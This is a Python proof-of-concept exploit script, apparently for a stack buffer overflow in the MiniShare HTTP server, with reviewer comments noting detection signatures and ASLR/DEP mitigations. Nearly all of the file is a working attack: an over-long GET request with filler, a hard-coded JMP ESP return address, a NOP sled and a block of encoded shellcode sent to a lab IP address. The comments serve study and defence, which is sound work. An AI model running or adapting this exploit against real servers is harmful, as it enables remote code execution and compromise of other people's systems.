exploitMinishare2.py
import socket
# Proof-of-concept for a stack buffer overflow in an HTTP server's handling of
# the GET request line. Going by the file name the target is MiniShare; the
# code itself does not name the product or version.
# It opens one TCP connection, sends a single over-long request and exits.
#
# Properties a defender can key on, all visible below:
#   - the request URI is roughly 2 KB long and carries raw non-ASCII bytes,
#     with a long run of 0x41 followed by a run of 0x90; a request-line length
#     limit or a content signature on the URI catches it;
#   - the value that overwrites the saved return address is a hard-coded
#     absolute address, so the request depends on one specific module build
#     being mapped at that address. Address randomisation (ASLR) removes that
#     assumption and non-executable stacks (DEP/NX) stop data placed after the
#     return address from running.
#
# NOTE(review): building the payload as a byte-valued str and passing it to
# send() is a Python 2 idiom -- confirm the intended interpreter.

# NOTE: this rebinds the name `socket` from the module to the connection
# object; the module is no longer reachable by that name after this line.
socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Hard-coded private (RFC 1918) address and port 80 -- presumably a lab host.
# No timeout is set, so connect() blocks until the OS gives up.
socket.connect(('192.168.1.200',80))
# Start of the HTTP request line; everything appended up to " HTTP/1.1" below
# becomes the request URI.
buffer = "GET /"
# 1786 filler bytes (0x41, ASCII 'A'). Presumably the distance to the saved
# return address in the targeted build -- not verifiable from this listing.
buffer += "\x41" * 1786
# Four bytes, little-endian, for address 0x7C86467B. Per the original note that
# address holds the opcode FF E4 (JMP ESP); which module it belongs to is not
# stated here.
buffer += '\x7B\x46\x86\x7C' # 7C86467B FFE4 JMP ESP
# 0xCC is the x86 INT3 software-breakpoint opcode. It looks like a debugging
# aid left in by the author -- TODO confirm.
buffer += '\xcc'
# 100 bytes of 0x90 (x86 NOP) as padding ahead of the payload.
buffer += '\x90' * 100
# NOTE(review): opaque, apparently encoded machine code with no provenance or
# description in the file; what it does on the target cannot be established
# from this listing.
buffer += ("\xdb\xc3\xd9\x74\x24\xf4\x58\x2b\xc9\xbb\xc3\xd7\x07\xe6" +
"\xb1\x56\x31\x58\x18\x03\x58\x18\x83\xe8\x3f\x35\xf2\x1a" +
"\x57\x33\xfd\xe2\xa7\x24\x77\x07\x96\x76\xe3\x43\x8a\x46" +
"\x67\x01\x26\x2c\x25\xb2\xbd\x40\xe2\xb5\x76\xee\xd4\xf8" +
"\x87\xde\xd8\x57\x4b\x40\xa5\xa5\x9f\xa2\x94\x65\xd2\xa3" +
"\xd1\x98\x1c\xf1\x8a\xd7\x8e\xe6\xbf\xaa\x12\x06\x10\xa1" +
"\x2a\x70\x15\x76\xde\xca\x14\xa7\x4e\x40\x5e\x5f\xe5\x0e" +
"\x7f\x5e\x2a\x4d\x43\x29\x47\xa6\x37\xa8\x81\xf6\xb8\x9a" +
"\xed\x55\x87\x12\xe0\xa4\xcf\x95\x1a\xd3\x3b\xe6\xa7\xe4" +
"\xff\x94\x73\x60\xe2\x3f\xf0\xd2\xc6\xbe\xd5\x85\x8d\xcd" +
"\x92\xc2\xca\xd1\x25\x06\x61\xed\xae\xa9\xa6\x67\xf4\x8d" +
"\x62\x23\xaf\xac\x33\x89\x1e\xd0\x24\x75\xff\x74\x2e\x94" +
"\x14\x0e\x6d\xf1\xd9\x3d\x8e\x01\x75\x35\xfd\x33\xda\xed" +
"\x69\x78\x93\x2b\x6d\x7f\x8e\x8c\xe1\x7e\x30\xed\x28\x45" +
"\x64\xbd\x42\x6c\x04\x56\x93\x91\xd1\xf9\xc3\x3d\x89\xb9" +
"\xb3\xfd\x79\x52\xde\xf1\xa6\x42\xe1\xdb\xd1\x44\x2f\x3f" +
"\xb2\x22\x52\xbf\x25\xef\xdb\x59\x2f\x1f\x8a\xf2\xc7\xdd" +
"\xe9\xca\x70\x1d\xd8\x66\x29\x89\x54\x61\xed\xb6\x64\xa7" +
"\x5e\x1a\xcc\x20\x14\x70\xc9\x51\x2b\x5d\x79\x1b\x14\x36" +
"\xf3\x75\xd7\xa6\x04\x5c\x8f\x4b\x96\x3b\x4f\x05\x8b\x93" +
"\x18\x42\x7d\xea\xcc\x7e\x24\x44\xf2\x82\xb0\xaf\xb6\x58" +
"\x01\x31\x37\x2c\x3d\x15\x27\xe8\xbe\x11\x13\xa4\xe8\xcf" +
"\xcd\x02\x43\xbe\xa7\xdc\x38\x68\x2f\x98\x72\xab\x29\xa5" +
"\x5e\x5d\xd5\x14\x37\x18\xea\x99\xdf\xac\x93\xc7\x7f\x52" +
"\x4e\x4c\x8f\x19\xd2\xe5\x18\xc4\x87\xb7\x44\xf7\x72\xfb" +
"\x70\x74\x76\x84\x86\x64\xf3\x81\xc3\x22\xe8\xfb\x5c\xc7" +
"\x0e\xaf\x5d\xc2")
# Close the request line with the HTTP version and an empty header block, so
# the server sees one syntactically complete GET request.
buffer +=" HTTP/1.1\r\n\r\n"
# Single send() whose return value is ignored; no response is read back.
socket.send(buffer)
# Not wrapped in try/finally, so the socket is not closed here if send() raises.
socket.close()